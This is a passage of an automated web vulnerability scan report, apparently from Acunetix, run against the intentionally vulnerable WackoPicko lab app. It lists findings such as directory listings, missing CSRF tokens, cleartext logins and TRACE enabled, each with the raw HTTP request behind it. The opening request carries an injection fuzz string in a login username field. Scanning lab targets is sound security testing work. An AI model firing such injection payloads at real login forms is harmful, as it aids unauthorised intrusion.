    Connection: keep-alive
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Content-Length: 77
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36

    💡
    password=g00dPa%24%24w0rD&username=12345'"\'\");|]*%00{%0d%0a<
    %00>%bf%27'

    Directory listing
    Affected item /WackoPicko/cart/
    Affected parameter
    Request
    GET /WackoPicko/cart/ HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    Directory listing
    Affected item /WackoPicko/comments/
    Affected parameter
    Request
    GET /WackoPicko/comments/ HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    Directory listing
    Affected item /WackoPicko/css/
    Affected parameter
    Request
    GET /WackoPicko/css/ HTTP/1.1
    Cookie: PHPSESSID=kc180u2rr3thbgefh30k8t06p4
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    Directory listing
    Affected item /WackoPicko/css/blueprint/
    Affected parameter
    Request
    GET /WackoPicko/css/blueprint/ HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    Directory listing
    Affected item /WackoPicko/css/blueprint/src/
    Affected parameter
    Request
    GET /WackoPicko/css/blueprint/src/ HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    Directory listing
    Affected item /WackoPicko/images/
    Affected parameter
    Request
    GET /WackoPicko/images/ HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    Directory listing
    Affected item /WackoPicko/images/menu/
    Affected parameter
    Request
    GET /WackoPicko/images/menu/ HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    Directory listing
    Affected item /WackoPicko/pictures/
    Affected parameter
    Request
    GET /WackoPicko/pictures/ HTTP/1.1
    Cookie: PHPSESSID=kc180u2rr3thbgefh30k8t06p4
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    Directory listing
    Affected item /WackoPicko/upload/
    Affected parameter
    Request
    GET /WackoPicko/upload/ HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    Directory listing
    Affected item /WackoPicko/upload/3/
    Affected parameter
    Request
    GET /WackoPicko/upload/3/ HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    Directory listing
    Affected item /WackoPicko/upload/LSiFMxMi/
    Affected parameter
    Request
    GET /WackoPicko/upload/LSiFMxMi/ HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    Directory listing
    Affected item /WackoPicko/upload/doggie/
    Affected parameter
    Request
    GET /WackoPicko/upload/doggie/ HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    Directory listing
    Affected item /WackoPicko/upload/flowers/
    Affected parameter
    Request
    GET /WackoPicko/upload/flowers/ HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    Directory listing
    Affected item /WackoPicko/upload/foos/
    Affected parameter
    Request
    GET /WackoPicko/upload/foos/ HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    Directory listing
    Affected item /WackoPicko/upload/house/
    Affected parameter
    Request
    GET /WackoPicko/upload/house/ HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    Directory listing
    Affected item /WackoPicko/upload/quarters/
    Affected parameter
    Request
    GET /WackoPicko/upload/quarters/ HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    Directory listing
    Affected item /WackoPicko/upload/testing/
    Affected parameter
    Request
    GET /WackoPicko/upload/testing/ HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    Directory listing
    Affected item /WackoPicko/upload/toga/
    Affected parameter
    Request
    GET /WackoPicko/upload/toga/ HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    Directory listing
    Affected item /WackoPicko/upload/twister/
    Affected parameter
    Request
    GET /WackoPicko/upload/twister/ HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    Directory listing
    Affected item /WackoPicko/upload/waterfall/
    Affected parameter
    Request
    GET /WackoPicko/upload/waterfall/ HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    Directory listing
    Affected item /WackoPicko/users/
    Affected parameter
    Request
    GET /WackoPicko/users/ HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    HTML form without CSRF protection


    Affected item Web Server
    Affected parameter
    Request
    GET /WackoPicko/guestbook.php HTTP/1.1
    Cookie: PHPSESSID=kc180u2rr3thbgefh30k8t06p4
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    HTML form without CSRF protection


    Affected item /WackoPicko/
    Affected parameter
    Request
    GET /WackoPicko/ HTTP/1.1
    Cookie: PHPSESSID=kc180u2rr3thbgefh30k8t06p4
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    HTML form without CSRF protection


    Affected item /WackoPicko/admin/index.php
    Affected parameter
    Request
    GET /WackoPicko/admin/index.php?page=login HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    HTML form without CSRF protection


    Affected item /WackoPicko/admin/login.php
    Affected parameter
    Request
    GET /WackoPicko/admin/login.php HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    HTML form without CSRF protection


    Affected item /WackoPicko/calendar.php
    Affected parameter
    Request
    GET /WackoPicko/calendar.php HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    HTML form without CSRF protection


    Affected item /WackoPicko/cart/review.php
    Affected parameter
    Request
    GET /WackoPicko/cart/review.php HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    HTML form without CSRF protection


    Affected item /WackoPicko/comments/preview_comment.php
    Affected parameter
    Request
    POST /WackoPicko/comments/preview_comment.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Content-Length: 17
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive
    picid=15&text=555

    HTML form without CSRF protection


    Affected item /WackoPicko/error.php
    Affected parameter
    Request
    GET /WackoPicko/error.php HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    HTML form without CSRF protection


    Affected item /WackoPicko/guestbook.php
    Affected parameter
    Request
    GET /WackoPicko/guestbook.php HTTP/1.1
    Cookie: PHPSESSID=kc180u2rr3thbgefh30k8t06p4
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    HTML form without CSRF protection


    Affected item /WackoPicko/index.php
    Affected parameter
    Request
    GET /WackoPicko/index.php HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    HTML form without CSRF protection


    Affected item /WackoPicko/passcheck.php
    Affected parameter
    Request
    GET /WackoPicko/passcheck.php HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    HTML form without CSRF protection


    Affected item /WackoPicko/piccheck.php
    Affected parameter
    Request
    POST /WackoPicko/piccheck.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----------bZ98P6t7Cq5T
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Content-Length: 323
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive
    ------------bZ98P6t7Cq5T
    Content-Disposition: form-data; name=""MAX_FILE_SIZE"
    30000
    ------------bZ98P6t7Cq5T
    Content-Disposition: form-data; name=""name"
    30000
    ------------bZ98P6t7Cq5T
    Content-Disposition: form-data; name="userfile"; filename="file.txt"
    Content-Type: text/plain
    ------------bZ98P6t7Cq5T--

    HTML form without CSRF protection


    Affected item /WackoPicko/pictures/recent.php
    Affected parameter
    Request
    GET /WackoPicko/pictures/recent.php HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    HTML form without CSRF protection


    Affected item /WackoPicko/pictures/search.php
    Affected parameter
    Request
    GET /WackoPicko/pictures/search.php?query=1 HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    HTML form without CSRF protection


    Affected item /WackoPicko/pictures/upload.php
    Affected parameter
    Request
    POST /WackoPicko/pictures/upload.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----------NRMBjST8K8bf
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Content-Length: 577
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive
    ------------NRMBjST8K8bf
    Content-Disposition: form-data; name=""MAX_FILE_SIZE"
    10485760
    ------------NRMBjST8K8bf
    Content-Disposition: form-data; name=""name"
    10485760
    ------------NRMBjST8K8bf
    Content-Disposition: form-data; name="pic"; filename="file.txt"
    Content-Type: text/plain
    ------------NRMBjST8K8bf
    Content-Disposition: form-data; name=""price"
    10485760
    ------------NRMBjST8K8bf
    Content-Disposition: form-data; name=""tag"
    10485760
    ------------NRMBjST8K8bf
    Content-Disposition: form-data; name=""title"
    10485760
    ------------NRMBjST8K8bf--

    HTML form without CSRF protection


    Affected item /WackoPicko/pictures/view.php
    Affected parameter
    Request
    GET /WackoPicko/pictures/view.php?picid=15 HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    HTML form without CSRF protection


    Affected item /WackoPicko/tos.php
    Affected parameter
    Request
    GET /WackoPicko/tos.php HTTP/1.1
    Cookie: PHPSESSID=kc180u2rr3thbgefh30k8t06p4
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    HTML form without CSRF protection


    Affected item /WackoPicko/users/login.php
    Affected parameter
    Request
    GET /WackoPicko/users/login.php HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    HTML form without CSRF protection


    Affected item /WackoPicko/users/register.php
    Affected parameter
    Request
    GET /WackoPicko/users/register.php HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    HTML form without CSRF protection


    Affected item /WackoPicko/users/sample.php
    Affected parameter
    Request
    GET /WackoPicko/users/sample.php?userid=1 HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    HTML form without CSRF protection


    Affected item /WackoPicko/users/view.php
    Affected parameter
    Request
    GET /WackoPicko/users/view.php?userid=11 HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    Insecure clientaccesspolicy.xml file


    Affected item Web Server
    Affected parameter
    Request
    GET /ClientAccessPolicy.xml HTTP/1.1
    Connection: keep-alive
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36

    Insecure crossdomain.xml file


    Affected item Web Server
    Affected parameter
    Request
    GET /crossdomain.xml HTTP/1.1
    Connection: keep-alive
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36

    PHP hangs on parsing particular strings as floating point number


    Affected item Web Server
    Affected parameter
    Request

    User credentials are sent in clear text


    Affected item Web Server
    Affected parameter
    Request
    GET /WackoPicko/passcheck.php HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    User credentials are sent in clear text


    Affected item /WackoPicko/admin/index.php
    Affected parameter
    Request
    GET /WackoPicko/admin/index.php?page=login HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    User credentials are sent in clear text


    Affected item /WackoPicko/admin/login.php
    Affected parameter
    Request
    GET /WackoPicko/admin/login.php HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    User credentials are sent in clear text


    Affected item /WackoPicko/passcheck.php
    Affected parameter
    Request
    GET /WackoPicko/passcheck.php HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    User credentials are sent in clear text


    Affected item /WackoPicko/users/login.php
    Affected parameter
    Request
    GET /WackoPicko/users/login.php HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    User credentials are sent in clear text


    Affected item /WackoPicko/users/register.php
    Affected parameter
    Request
    GET /WackoPicko/users/register.php HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    Apache mod_negotiation filename bruteforcing


    Affected item Web Server
    Affected parameter
    Request
    GET /index HTTP/1.1
    Accept: acunetix/wvs
    Connection: keep-alive
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36

    Clickjacking: X-Frame-Options header missing


    Affected item Web Server
    Affected parameter
    Request
    GET / HTTP/1.1
    Connection: keep-alive
    Cookie: PHPSESSID=kc180u2rr3thbgefh30k8t06p4
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36

    Login page password-guessing attack


    Affected item /WackoPicko/admin/index.php
    Affected parameter
    Request
    POST /WackoPicko/admin/index.php?page=UHOdllxh HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Referer: http://192.168.1.124/WackoPicko/
    Connection: keep-alive
    Accept: */*
    Accept-Encoding: gzip,deflate
    Content-Length: 36
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    adminname=xVfPsccC&password=XtqEPWIB

    Login page password-guessing attack


    Affected item /WackoPicko/users/login.php
    Affected parameter
    Request
    POST /WackoPicko/users/login.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Referer: http://192.168.1.124/WackoPicko/
    Connection: keep-alive
    Accept: */*
    Accept-Encoding: gzip,deflate
    Content-Length: 35
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    password=t9EX25js&username=m6imCmzG

    Possible sensitive directories


    Affected item /WackoPicko/admin
    Affected parameter
    Request
    GET /WackoPicko/admin HTTP/1.1
    Accept: acunetix/wvs
    Range: bytes=0-99999
    Connection: keep-alive
    Cookie: PHPSESSID=kc180u2rr3thbgefh30k8t06p4
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36

    Possible sensitive directories


    Affected item /WackoPicko/upload
    Affected parameter
    Request
    GET /WackoPicko/upload HTTP/1.1
    Accept: acunetix/wvs
    Range: bytes=0-99999
    Connection: keep-alive
    Cookie: PHPSESSID=kc180u2rr3thbgefh30k8t06p4
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36

    Possible sensitive directories


    Affected item /WackoPicko/users
    Affected parameter
    Request
    GET /WackoPicko/users HTTP/1.1
    Accept: acunetix/wvs
    Range: bytes=0-99999
    Connection: keep-alive
    Cookie: PHPSESSID=kc180u2rr3thbgefh30k8t06p4
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36

    Possible sensitive files


    Affected item /WackoPicko/admin/.gitignore
    Affected parameter
    Request
    GET /WackoPicko/admin/.gitignore HTTP/1.1
    Accept: acunetix/wvs
    Connection: keep-alive
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36

    Possible sensitive files


    Affected item /WackoPicko/test.php
    Affected parameter
    Request
    GET /WackoPicko/test.php HTTP/1.1
    Accept: acunetix/wvs
    Connection: keep-alive
    Cookie: PHPSESSID=kc180u2rr3thbgefh30k8t06p4
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36

    TRACE method is enabled


    Affected item Web Server
    Affected parameter
    Request
    TRACE /rRM2kryref HTTP/1.1
    Connection: keep-alive
